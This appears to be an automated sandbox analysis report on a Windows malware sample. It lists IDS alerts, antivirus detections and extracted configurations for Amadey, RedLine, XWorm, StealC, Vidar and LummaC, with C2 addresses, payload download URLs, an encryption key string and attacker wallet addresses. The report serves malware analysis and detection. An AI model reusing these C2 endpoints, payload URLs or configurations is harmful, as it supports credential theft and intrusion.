                                  2024-09-27T04:21:36.426655+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:36.732332+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:36.906933+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:37.079702+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:38.121784+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:38.733929+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:38.740303+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:39.303670+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:39.477939+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:39.595188+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:39.800528+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:39.805609+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:39.891955+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:41.024523+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:41.985937+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:42.263346+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:42.468552+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:42.605262+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:42.650790+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:42.826859+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:42.834216+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:43.041333+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:43.116994+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:43.214866+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:43.442435+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:43.994728+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:44.092300+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:44.167289+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:44.339968+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:44.485367+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:44.650067+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:44.711706+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:45.150099+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:45.367800+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:46.452161+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:46.672609+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:46.892502+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:47.203326+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:47.422258+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:47.718337+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:47.936019+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:48.389197+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:13.595211+020020460561A Network Trojan was detected95.179.250.4526212192.168.2.549714TCP
                                  2024-09-27T04:21:17.848571+020020460561A Network Trojan was detected65.21.18.5145580192.168.2.549719TCP
                                  2024-09-27T04:21:35.399703+020020460561A Network Trojan was detected89.105.223.19629862192.168.2.549743TCP
                                  2024-09-27T04:21:38.430892+020020460561A Network Trojan was detected185.215.113.6715206192.168.2.549750TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:06.076576+020020446961A Network Trojan was detected192.168.2.549712185.215.113.1680TCP
                                  2024-09-27T04:21:08.998809+020020446961A Network Trojan was detected192.168.2.549715185.215.113.1680TCP
                                  2024-09-27T04:21:12.438395+020020446961A Network Trojan was detected192.168.2.549720185.215.113.1680TCP
                                  2024-09-27T04:21:14.491667+020020446961A Network Trojan was detected192.168.2.549723185.215.113.1680TCP
                                  2024-09-27T04:21:20.850558+020020446961A Network Trojan was detected192.168.2.549728185.215.113.1680TCP
                                  2024-09-27T04:21:23.491147+020020446961A Network Trojan was detected192.168.2.549731185.215.113.1680TCP
                                  2024-09-27T04:21:26.566308+020020446961A Network Trojan was detected192.168.2.549738185.215.113.1680TCP
                                  2024-09-27T04:21:29.465052+020020446961A Network Trojan was detected192.168.2.549744185.215.113.1680TCP
                                  2024-09-27T04:21:32.022330+020020446961A Network Trojan was detected192.168.2.549749185.215.113.1680TCP
                                  2024-09-27T04:21:34.673992+020020446961A Network Trojan was detected192.168.2.549753185.215.113.1680TCP
                                  2024-09-27T04:21:36.986236+020020446961A Network Trojan was detected192.168.2.549757185.215.113.1680TCP
                                  2024-09-27T04:21:41.327037+020020446961A Network Trojan was detected192.168.2.549763185.215.113.1680TCP
                                  2024-09-27T04:21:45.407138+020020446961A Network Trojan was detected192.168.2.549774185.215.113.1680TCP
                                  2024-09-27T04:21:50.680334+020020446961A Network Trojan was detected192.168.2.549785185.215.113.1680TCP
                                  2024-09-27T04:21:53.973182+020020446961A Network Trojan was detected192.168.2.549782185.215.113.4380TCP
                                  2024-09-27T04:21:56.466873+020020446961A Network Trojan was detected192.168.2.549782185.215.113.4380TCP
                                  2024-09-27T04:22:01.219170+020020446961A Network Trojan was detected192.168.2.549782185.215.113.4380TCP
                                  2024-09-27T04:22:07.424305+020020446961A Network Trojan was detected192.168.2.549782185.215.113.4380TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:39.568380+020020561561Domain Observed Used for C2 Detected192.168.2.5609241.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:46.017818+020020561541Domain Observed Used for C2 Detected192.168.2.5556651.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:41.811165+020020561621Domain Observed Used for C2 Detected192.168.2.5630621.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:40.882674+020020561641Domain Observed Used for C2 Detected192.168.2.5548041.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:42.843407+020020561601Domain Observed Used for C2 Detected192.168.2.5528551.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:48.022682+020020561501Domain Observed Used for C2 Detected192.168.2.5556861.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:47.003766+020020561521Domain Observed Used for C2 Detected192.168.2.5609641.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:43.849666+020020561581Domain Observed Used for C2 Detected192.168.2.5560061.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:15.518160+020020442451Malware Command and Control Activity Detected185.215.113.1780192.168.2.549722TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:15.512109+020020442441Malware Command and Control Activity Detected192.168.2.549722185.215.113.1780TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:15.743022+020020442461Malware Command and Control Activity Detected192.168.2.549722185.215.113.1780TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:16.427085+020020442481Malware Command and Control Activity Detected192.168.2.549722185.215.113.1780TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:15.836522+020020442471Malware Command and Control Activity Detected185.215.113.1780192.168.2.549722TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:08.140028+020020460451A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:12.148645+020020460451A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:29.352246+020020460451A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:32.851910+020020460451A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:15.281835+020020442431Malware Command and Control Activity Detected192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:35.722605+020020442431Malware Command and Control Activity Detected192.168.2.54975591.202.233.15880TCP
                                  2024-09-27T04:21:42.610943+020020442431Malware Command and Control Activity Detected192.168.2.549767185.215.113.3780TCP
                                  2024-09-27T04:21:53.975115+020020442431Malware Command and Control Activity Detected192.168.2.549791185.215.113.3780TCP
                                  2024-09-27T04:21:56.463262+020020442431Malware Command and Control Activity Detected192.168.2.549796185.215.113.3780TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:03.109743+020028561471A Network Trojan was detected192.168.2.549710185.215.113.1680TCP
                                  2024-09-27T04:21:13.800459+020028561471A Network Trojan was detected192.168.2.549721185.215.113.2680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:05.370019+020028561221A Network Trojan was detected185.215.113.1680192.168.2.549710TCP
                                  2024-09-27T04:21:18.379078+020028561221A Network Trojan was detected185.215.113.2680192.168.2.549721TCP
                                  2024-09-27T04:21:53.673028+020028561221A Network Trojan was detected185.215.113.4380192.168.2.549782TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:04.166961+020028033053Unknown Traffic192.168.2.549711185.215.113.11780TCP
                                  2024-09-27T04:21:06.704853+020028033053Unknown Traffic192.168.2.549713194.116.215.19580TCP
                                  2024-09-27T04:21:09.984061+020028033053Unknown Traffic192.168.2.549716185.215.113.2680TCP
                                  2024-09-27T04:21:12.657577+020028033053Unknown Traffic192.168.2.549720185.215.113.1680TCP
                                  2024-09-27T04:21:14.987691+020028033053Unknown Traffic192.168.2.549724176.113.115.9580TCP
                                  2024-09-27T04:21:15.269386+020028033053Unknown Traffic192.168.2.549725185.215.113.11780TCP
                                  2024-09-27T04:21:21.116616+020028033053Unknown Traffic192.168.2.549728185.215.113.1680TCP
                                  2024-09-27T04:21:24.234487+020028033053Unknown Traffic192.168.2.549733185.215.113.11780TCP
                                  2024-09-27T04:21:27.329679+020028033053Unknown Traffic192.168.2.549740185.215.113.11780TCP
                                  2024-09-27T04:21:29.688021+020028033053Unknown Traffic192.168.2.549744185.215.113.1680TCP
                                  2024-09-27T04:21:32.247108+020028033053Unknown Traffic192.168.2.549749185.215.113.1680TCP
                                  2024-09-27T04:21:34.905386+020028033053Unknown Traffic192.168.2.549753185.215.113.1680TCP
                                  2024-09-27T04:21:37.791130+020028033053Unknown Traffic192.168.2.549759185.215.113.10380TCP
                                  2024-09-27T04:21:42.150872+020028033053Unknown Traffic192.168.2.549766185.215.113.10380TCP
                                  2024-09-27T04:21:46.036192+020028033053Unknown Traffic192.168.2.549774185.215.113.1680TCP
                                  2024-09-27T04:21:57.192672+020028033053Unknown Traffic192.168.2.549799185.215.113.10380TCP
                                  2024-09-27T04:22:02.175425+020028033053Unknown Traffic192.168.2.549812185.215.113.1680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:16.988562+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:24.196540+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:25.629497+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:26.443025+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:27.063921+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:28.866765+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP
                                  2024-09-27T04:21:29.597316+020028033043Unknown Traffic192.168.2.549722185.215.113.1780TCP

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: file.exeAvira: detected
                                  Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                  Source: lootebarrkeyn.shopAvira URL Cloud: Label: malware
                                  Source: stogeneratmns.shopAvira URL Cloud: Label: malware
                                  Source: http://91.202.233.158/Avira URL Cloud: Label: malware
                                  Source: https://reinforcenh.shop/apiAvira URL Cloud: Label: malware
                                  Source: http://91.202.233.158/e96ea2db21fa9a1b.phpAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.16/inc/rstxdhuj.exez&Avira URL Cloud: Label: phishing
                                  Source: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHDAvira URL Cloud: Label: malware
                                  Source: fragnantbui.shopAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/2fb6c2cc8dce150a.php3Avira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/2fb6c2cc8dce150a.php4Avira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJaAvira URL Cloud: Label: malware
                                  Source: offensivedzvju.shopAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.103/mine/random.exeAvira URL Cloud: Label: malware
                                  Source: http://194.116.215.195/12dsvc.exeAvira URL Cloud: Label: malware
                                  Source: http://176.113.115.95/thebig/stories.exeAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dllAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/2fb6c2cc8dce150a.phpfAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.17/2fb6c2cc8dce150a.phppAvira URL Cloud: Label: malware
                                  Source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                                  Source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
                                  Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                                  Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
                                  Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
                                  Source: 13.2.RegAsm.exe.400000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["lootebarrkeyn.shop", "ghostreedmnu.shop", "fragnantbui.shop", "vozmeatillu.shop", "stogeneratmns.shop", "reinforcenh.shop", "offensivedzvju.shop", "gutterydhowi.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}
                                  Source: ballotnwu.siteVirustotal: Detection: 8%Perma Link
                                  Source: lootebarrkeyn.shopVirustotal: Detection: 15%Perma Link
                                  Source: http://91.202.233.158/Virustotal: Detection: 19%Perma Link
                                  Source: https://reinforcenh.shop/apiVirustotal: Detection: 15%Perma Link
                                  Source: http://91.202.233.158/e96ea2db21fa9a1b.phpVirustotal: Detection: 21%Perma Link
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exeReversingLabs: Detection: 95%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exeReversingLabs: Detection: 87%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exeReversingLabs: Detection: 33%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exeReversingLabs: Detection: 68%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeReversingLabs: Detection: 50%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exeReversingLabs: Detection: 95%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exeReversingLabs: Detection: 13%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exeReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exeReversingLabs: Detection: 76%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exeReversingLabs: Detection: 79%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exeReversingLabs: Detection: 100%
                                  Source: file.exeVirustotal: Detection: 56%Perma Link
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exeJoe Sandbox ML: detected
                                  Source: file.exeJoe Sandbox ML: detected
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: reinforcenh.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fragnantbui.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                  Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TBnDlH--
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: 188.190.10.161
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: 4444
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: <IlwAYl63V65*l#>
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: <Xwormmm>
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: XWorm V5.6
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: USB.exe
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
                                  Source: 37.2.InstallUtil.exe.800000.0.unpackString decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h

                                  Compliance

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeUnpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack
                                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fido Video Recorder_is1
                                  Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49761 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49764 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49770 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49772 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49775 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49777 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49779 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49780 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49783 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49786 version: TLS 1.2
                                  Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
                                  Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
                                  Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000003.3054996905.0000000005F26000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999307768.0000000005F2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138409494.0000000005F2C000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2998919451.0000000005F23000.00000004.00000020.00020000.00000000.sdmp
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B6EA FindFirstFileExW,13_2_0041B6EA
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001CD9FD FindFirstFileExW,16_2_001CD9FD
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0024D9FD FindFirstFileExW,17_2_0024D9FD
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\Documents\desktop.ini
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData\Local\Temp
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData\Local
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06E4E122h9_2_06E4DE60
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06E4E7B8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06E4F70Ah9_2_06E4F2D8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06E4FB8Ah9_2_06E4F2D8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc dword ptr [ebp-20h]9_2_06E42E88
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06E4ACCBh9_2_06E4ACB3
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06E4CD8Dh9_2_06E4CD6C
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc dword ptr [ebp-20h]9_2_06E43158
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EBD2C0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then jmp eax14_2_00EF7600
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00EFA7E0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h14_2_00EFAC00
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh14_2_00EF50E0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE40F5
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE40F5
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then push ebx14_2_00EC5078
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]14_2_00EB7120
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00EDA2F9
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [edx], ax14_2_00EDA2F9
